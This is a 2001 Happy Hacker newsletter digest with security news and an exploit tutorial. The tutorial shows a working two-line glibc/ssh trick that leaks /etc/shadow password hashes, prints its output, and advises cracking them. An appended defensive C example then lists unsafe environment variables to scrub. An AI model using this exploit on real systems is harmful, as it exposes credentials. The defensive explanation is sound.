From: cmeinel@t...
Date: Wed May 9, 2001 10:32 am
Subject: News from Happy Hacker

Inside Happy Hacker Jan. 19, 2001
___________________________________________________________

See the Happy Hacker web site at http://www.happyhacker.org. Firewall or web babysitter program blocks you? Try http://happyhacker.org. Still doesn't work? Try entering 206.62.52.30 in the location window of your web browser.

Inside this issue:
* New at the Happy Hacker web site
* Anti-spam laws under consideration
* PC Help site under attack by greedy computer security company
* Windows forensics course
* Write your own exploits

*** New at the Happy Hacker web site:

* Tired of all those kiddie haxors trying to break into your home computer? Keep them out and give them a hard time with help available at http://happyhacker.org/HHA/
* Are elements of the computer security industry running a protection racket? Check out http://happyhacker.org/HHA/cult1.shtml
* The "It sucks to be me" section is getting input from major league criminals nowadays. We say the bigger they are, the harder they are going to fall, heh, heh... http://happyhacker.org/sucks/
* Want to be a hero on the cyberspace frontier? Go here for links on what groups rock and which groups suck. http://happyhacker.org/defend/vigilante.shtml

*** Anti-spam laws under consideration

Getting tired of all that spam? Some folks think there ought to be a law.

H.R. 1017: The Anti-Spam Act of 2001
http://thomas.loc.gov/cgi-bin/bdquery/z?d107:h.r.01017:

S.630: CAN SPAM Act of 2001
http://thomas.loc.gov/cgi-bin/bdquery/z?d107:s.00630:

*** PC Help site under attack by greedy computer security company

For many years Keith Little has run a free help site for PC users, http://www.nwinternet.com/~pchelp/index.html. One of his services is to review products. For example, Little reports that Lockdown 2000 sucks.

Now the owner of the company that sells Lockdown, Michael Paris, is suing Little. If you think that people should be free to write about software on their web sites, even if we discover that software sucks, you may consider contributing money to the defense fund for Keith Little. To read more about it, see the defense fund at http://Pchelpers.org.

*** Windows forensics course

I (Carolyn Meinel) took the course "E-Forensics: A Clinic in Systems Security Practices" at the University of Texas at Austin in January. The course is awesome! I learned how to hide data in the weirdest places and how to hex edit command.com so that, for example, the "dir" command would do something totally different, for example "deltree", muhahah... The instructors are upstanding citizens who just happen to be serious hackers. I mean, if they can teach me things I never even dreamed of doing...

May 21 - 25, 2001
Presented by: Dan Mares of Mares and Company, LLC & Larry Leibrock, PhD, Dean for Technology of the McCombs School of Business, UT Austin
For more information, see http://bevo2.bus.utexas.edu/ctec/forensics/

*** Write your own exploits

Back last January, Greggory Peck and Bill Marchand were kinda wondering about reports of an exploit in glibc (a library used by programs built with the C compiler). Here's how the security alert at http://securityfocus.com described it:

"Upon execution of SUID and SGID applications, the library allows a user to preload libraries in the environment variable LD_PRELOAD providing the variable does not contain forward slashes. A special check is also performed to ensure the library being preloaded is SUID. However, if the library is found in the /etc/ld.so.cache file, this check is circumvented, and never performed. It is therefore possible to load a library from /lib or /usr/lib prior to the execution of a SUID or SGID program.
This flaw makes it possible for a user with malicious motives to create files in restricted locations, or overwrite files outside of the access of this user, including system files."

What this means is you could use glibc to overwrite the password files to add yourself as a user with root privileges. However, no exploit program was provided along with this alert to prove this could be done. Instead of waiting for someone to hand them a glibc exploit program, Greggory and Bill wrote their own.

Now I'm not about to give you a program to make your own root accounts on the million or so vulnerable computers still on the Internet. (Need to fix your Linux box? Upgrade to a non-vulnerable glibc at ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/glibc-2.1.3-27.src.rpm). Do you want to figure out how to write this exploit yourself? Greggory gave me a simple, two-line exploit that falls one step short of taking over a victim computer. From what this exploit shows, you may be able to figure out how to write a much more powerful one.

    [carolyn@g... carolyn]$ export RESOLV_HOST_CONF=/etc/shadow
    [carolyn@g... carolyn]$ ssh unixhq.org
    /etc/shadow: line 1: bad command `root:$1 $R94aFIrb$yg3.fZX3FIDEPNGI6XhFi.:11345:0:99999:7:::134537380'
    `fooagency:$1 $Ai09/Mfg$6dL1.znVoEjYzEaH4/7jE1:11035::99999::0::135521068'
    /etc/shadow: line 25: bad command `netfubblywood:$1 $p32k1k4Y$QivfvBAzhvQBGBe100uy31:11022::99999::0::135595996'
    /etc/shadow: line 26: bad command `fezfoo:$1 $UDOsz5ul$Wq1GAtI0yVCQPKddPdX.z0:11279::99999::0::135722004'
    /etc/shadow: line 27: bad command `administrivia:$1 $hh.PfQ7O$j9ieAgBn26sDdmklcnr3t0:11367::99999::::134537732'
    /etc/shadow: line 28: bad command `embezzlement:$1 $XGRgvTOH$uDTKnjVYlviKI5T0.PWTc1:11035::99999::::135630316'
    /etc/shadow: line 29: bad command `charlieroot:$1 $Up5CJvzV$iraAkrXd199e9x1HE0pqp/:10870::99999::::135437276'
    /etc/shadow: line 30: bad command `fubmann:$1 $IYMWht1r$Z02PJVIVsR1aZbyATgXkb0:10893::99999::::135483348'
    /etc/shadow: line 31: bad command `yana:$1 $bJ7a9LOR$Ct57BRRl8DJxWXHM9L347/:11009::99999::::135623820'
    /etc/shadow: line 32: bad command `dreamfubar:$1 $UGlXUINz$br7XLwRYZqa8784Lel7g/1:10928::99999::::134537804'
    /etc/shadow: line 33: bad command `jdfubbly:$1 $Hl1VU8fq$qJFCcEXwHqbhyYdUG02oH/:11212::99999::::135713404'
    /etc/shadow: line 34: bad command `a-no-ne:$1$WoMDMG02 $AL5mnLfJIuBJ4tdDzuGjm0:10927::99999::::135517804'
    /etc/shadow: line 35: bad command `ajcrosefubarino:$1 $WA.j1NbH$Uz7m8D.13T5KORkYOGl80/:10927::99999::::135508124'

How does it work? In this case, I was trying it on an out-of-the-box Red Hat 6.0 box. I won't guarantee it works on anything else. (For example, on another box ssh might not be SUID.) In this case I was logged in as an unprivileged user.

1) The first line uses the export command to associate "RESOLV_HOST_CONF" with the /etc/shadow file, which contains encrypted passwords. Normally as an unprivileged user I can't read this file.
2) The second line is the command to run the secure shell client program. In this situation it was set up to run as root (SUID).
3) Voila! Thanks to that export command, the contents of the file /etc/shadow are now being piped into the command "ssh". Of course we get lots of bad command messages, but that is irrelevant because what I really want is the contents of /etc/shadow.
4) Run the encrypted passwords through a cracking program.

What else can you do with Red Hat 6.0 and its bad glibc? Greggory and Bill figured out this one by reasoning that a system call plus a program that runs with root privileges would make a nifty exploit. So they simply tried out a bunch of system commands and mixed and matched them with other cool stuff.

So what does this tell us? If you want to create your own ways to break into computers, it helps to really, really understand the operating system you are attacking, and the programs that run on it. Anyhow, if you want to get a fast start, you can set up your own Linux box (you need glibc prior to version 2.1.3-27, so get some older version like Red Hat 6.0), study the manuals, and have fun!

You can go to jail warning! If you figure this one out and go on a hacking rampage and get caught, the judge will not let you off just because the owners of the victim computers were too dumb to upgrade glibc.

___________________________________________________________________
This is a list devoted to *legal* hacking! If anyone plans to use any information in this Digest or at our Web site to commit crime, go away! We like to put computer criminals behind bars where they belong!

Unix editor Mike Miller unixeditor@t...; Windows editor Greggory Peck wineditor@t...
Mac editor Pat St. Arnaud, maceditor@t...
Network editor neteditor@t...
Clown Princess: Carolyn Meinel cmeinel@t...

Happy Hacker, Inc. is part of a 501 (c) (3) tax deductible organization
___________________________________________________________________
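Postscript to the "Write your own exploits" item above, from the defender's side. The root cause of the RESOLV_HOST_CONF trick is that a set-user-ID program (ssh on that Red Hat 6.0 box) let the unprivileged caller's environment tell the C library which file to open. Later glibc releases ignore RESOLV_HOST_CONF and the LD_* loader variables when the process is set-user-ID, and glibc 2.17 added secure_getenv() so application code can do the same. The C program below is an added example, not code from the digest or from glibc, showing the same rule applied by a privileged program itself: detect that real and effective IDs differ, refuse to honour file- or library-naming variables, and scrub them before doing anything else. The list of variable names and the helper names (process_is_privileged, is_unsafe_env_var, safe_getenv, scrub_environment) are this example's own choices; a real check would also consider capabilities, which this simplification does not.

```c
/* Added example: environment hygiene for a program that may run set-user-ID.
 * Not part of the Happy Hacker digest or of glibc; the variable list and
 * helper names are assumptions made for this illustration. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

/* Variables that name files or libraries the C library would open on the
 * caller's behalf. A privileged process must never trust them. (Assumed list.) */
static const char *const unsafe_vars[] = {
    "RESOLV_HOST_CONF", "HOSTALIASES", "LOCALDOMAIN", "RES_OPTIONS",
    "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT", "MALLOC_CHECK_",
    NULL
};

/* The process carries more privilege than its caller when the effective
 * IDs differ from the real ones, i.e. it was started set-user/group-ID. */
int process_is_privileged(void) {
    return getuid() != geteuid() || getgid() != getegid();
}

/* 1 if this variable must not be honoured by privileged code, else 0.
 * Every LD_* name is treated as loader input, not only the ones listed. */
int is_unsafe_env_var(const char *name) {
    if (strncmp(name, "LD_", 3) == 0) return 1;
    for (size_t i = 0; unsafe_vars[i] != NULL; i++)
        if (strcmp(name, unsafe_vars[i]) == 0) return 1;
    return 0;
}

/* getenv() that answers NULL for unsafe names while privileged (the idea
 * behind glibc's secure_getenv(), re-implemented here for illustration). */
const char *safe_getenv(const char *name) {
    if (process_is_privileged() && is_unsafe_env_var(name)) return NULL;
    return getenv(name);
}

/* Remove every unsafe variable from the environment. Runs only when the
 * process is privileged unless force is non-zero. Returns the count removed.
 * The scan restarts after each unsetenv() because it shifts environ. */
int scrub_environment(int force) {
    if (!force && !process_is_privileged()) return 0;
    int removed = 0;
    char name[256];
    for (;;) {
        int found = 0;
        for (char **e = environ; e != NULL && *e != NULL; e++) {
            const char *eq = strchr(*e, '=');
            if (eq == NULL) continue;              /* malformed entry: skip */
            size_t n = (size_t)(eq - *e);
            if (n == 0 || n >= sizeof name) continue;
            memcpy(name, *e, n);
            name[n] = '\0';
            if (is_unsafe_env_var(name)) { found = 1; break; }
        }
        if (!found || unsetenv(name) != 0) break;  /* stop on failure, no spin */
        removed++;
    }
    return removed;
}

int main(void) {
    /* Scrub first, before any library call that might consult the environment. */
    int n = scrub_environment(1);
    printf("removed %d environment variable(s) a privileged program must not trust\n", n);
    const char *conf = safe_getenv("RESOLV_HOST_CONF");
    printf("RESOLV_HOST_CONF now: %s\n", conf ? conf : "(unset)");
    return 0;
}
```

The order matters: scrub (or at least stop trusting the variables) before the first resolver or loader-affecting call, since by the time ssh in the transcript above printed its "bad command" lines the file had already been read. In the digest's scenario the value comes from the user's own shell, so nothing on the network is involved; what this hardening buys is that a set-user-ID binary no longer turns the caller's environment into a read of files the caller cannot open.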